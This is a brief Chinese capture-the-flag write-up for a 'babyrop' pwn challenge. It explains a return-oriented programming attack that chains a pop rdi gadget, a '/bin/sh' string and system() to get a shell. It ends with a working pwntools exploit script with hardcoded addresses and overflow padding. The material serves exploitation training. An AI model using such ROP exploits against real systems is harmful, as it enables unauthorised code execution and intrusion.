0x01 文件分析
0x02 運行
一組回顯
0x03 IDA
程序之中存在system函數,通過搜索字符串,還能得到’/bin/sh’字符串,一個簡單的rop。
0x04 思路
簡單rop,利用萬能的gadget,pop rdi ret傳入字符串並調用system,得到shell。此題flag的位置在/home/babyrop內,可以通過find -name flag查找位置。
0x05 exp
from pwn import *
p = process("./babyrop")
#p = remote('node3.buuoj.cn', 27401)
sys_addr = 0x0000000000400490
bin_sh = 0x0000000000601048
pop_rdi = 0x0000000000400683
p.recvuntil('? ')
p.sendline('a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr))
p.interactive()